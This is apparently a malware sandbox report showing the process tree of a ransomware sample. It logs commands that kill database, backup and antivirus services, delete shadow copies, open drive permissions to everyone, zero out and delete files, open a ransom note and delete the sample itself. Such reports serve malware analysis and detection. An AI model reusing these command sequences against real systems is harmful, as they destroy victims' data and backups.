C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.7.0.382⤵
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe2⤵
- Deletes itself
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18289807151352858742-8324101557131368271433414331-416343301-2040673960-1830363609"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4987969421277729446-131917685114230090741657916113-1095825130-273387517-1688641721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1263006152-200403934310770645631357485370-1870562662-3855626721957895606446512797"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1338478048692204442-589499493566985381-845025998-9131827451549502903-627286570"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1771760948953957088275630135-20624908981928044529-1308073370-585933630-599600691"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1886127353499475549572316306121177654185809868870439430294527925357311721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18257167871241801297-32906372-105772277917118546491039784861-345219586-1956506290"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-379188099378699571206186534468918915810265301541902289-883591463-1282819902"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "186174329590834194119852874251295677114-5764970512694579921977930304-647278707"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2031626407-15224929751530651702-17488481001097973722145922236911265563721729200157"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "75010337-184488126149658656-1274287765-165737540-5783656064728533401955655838"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "201226650-1464482533821524010-15127183941439571308-18128944671842332923-1036207546"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "311603653-452075682657738890-755843958243976258-174273659715175164341615731902"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "430401666-525313962-2007446770-1428883817-1019015845572154009-1657250135-248827161"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-991384099-346732710-1869797485-1956480402-1043964505-25361437-1731863603-749305513"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1306305161-112975228-11470914441064901489158293846918400240681343741505-2056049243"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1470868858648310129-737800280-121314866793104301721188721121850992254-1567865115"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "712065816-1407011930110088915861711290-837355539-744483578-12595142252084066721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2112686704-15772515021845780559-3919887045520108881162705411128788738597013131"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "504299217-7888132293365391441867478779-1917245976056759182092257589-1714512138"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-711583106187059296115986778291464993101149173128-2146192296593226486391833256"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16313980881564576470-1743115518458247823-17076463241058878567-13949308291096973043"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB